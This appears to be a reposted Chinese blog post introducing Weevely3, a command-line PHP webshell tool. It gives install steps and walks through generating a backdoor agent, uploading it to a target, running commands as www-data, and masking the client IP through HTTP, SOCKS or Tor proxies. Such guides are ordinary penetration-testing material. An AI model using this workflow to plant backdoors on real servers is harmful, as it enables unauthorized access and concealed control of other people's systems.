Weevely3:一个可用于远程服务器管理和渗透测试的命令行webshell

项目主页

http://ift.tt/1ECmr4O

简介

weevely3是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。Weevely类似于菜刀,一个厚客户端,与一个轻服务端,由客户端生成要执行的代码,传递到服务端执行。与菜刀不同的是Weevely只提供命令行终端,同时自己生成服务端文件。

安装

Linux

  • Debian/Ubuntu
# Make sure that the python package manager and yaml libraries are installed
$ sudo apt-get install g++ python-pip libyaml-dev python-dev
# Install requirements
$ sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

OS X

  • MacPorts
$ sudo port install python27 py27-pip
$ sudo port select --set pip pip27
$ sudo port select --set python python27
# Ideally, at this point you should install editline library (http://ift.tt/1f68GuN)
# to have a working line completion in terminal. See issue #7 for more info.
$ sudo pip install prettytable Mako PyYAML python-dateutil readline PySocks --upgrade

Windows

  • 安装Python 2.7和使用ez_setup.py安装pip包管理器
# Enter in a folder which allows to call pip.exe usually C:\Python27\Scripts\ with no %PATH% set and
# install the following requirements
> pip install prettytable Mako PyYAML python-dateutil pyreadline PySocks --upgrade

生成webshell

运行./weevely.py打印帮助文档

$ ./weevely.py 
[+] weevely 3.0
[!] Error: too few arguments

[+] Run terminal to the target
 weevely <URL> <password>

[+] Load session file
 weevely session <path>

[+] Generate backdoor agent
 weevely generate <password> <path>

使用generate选项传递密码和路径参数来生成一个新的webshell

$ ./weevely.py generate mypassword agent.php
Generated backdoor with password 'mypassword' in 'agent.php' of 1469 byte size.

然后,将webshell上传至目标可访问目录下。

连接webshell

运行./weevely.py(shell路径+密码)连接到远程webshell

$ ./weevely.py http://target/agent.php mypassword
weevely>

如果显示weevely>提示符仍未连接,用户可以使用其他有用的预连接选项。例如:使用代理。

weevely> ls
agent.php
index.html
joomla-3.2.1
www-data@target:/var/www $ cd ..
www-data@target:/var/ $ whoami
www-data
www-data@target:/var/ $ uname -a
Linux ubuntu 3.2.0-65-generic 99-Ubuntu SMP Fri Jul 4 21:04:27 UTC 2014 i686 i686 i386 GNU/Linux
www-data@target:/var/ $

使用代理

weevely3支持HTTP,SOCKS,Tor等代理方式

基本用法

设置代理

weevely> :set proxy <type>://<host>:<port>

停用代理

weevely> :unset proxy

示例

使用HTTP代理连接

www-data@target:/var/www $ :set proxy http://10.24.21.12:8080
proxy = http://10.24.21.12:8080
www-data@target:/var/www $ :system_info -info client_ip
10.24.21.12

使用Tor SOCKS5代理端口9050连接

www-data@target:/var/www $ :set proxy socks5://127.0.0.1:9050
proxy = socks5://127.0.0.1:8080
www-data@target:/var/www $ :system_info -info client_ip
5.9.123.81

使用SOCKS4代理连接

www-data@target:/var/www $ :set proxy socks4://10.24.21.12:8090
proxy = socks4://10.24.21.12:8090
www-data@target:/var/www $ :system_info -info client_ip
10.24.21.12

详细使用请参考:http://ift.tt/2ft8a0D

未经允许不得转载:MottoIN » Weevely3:一个可用于远程服务器管理和渗透测试的命令行webshell

from MottoIN http://ift.tt/2fKodui
via IFTTT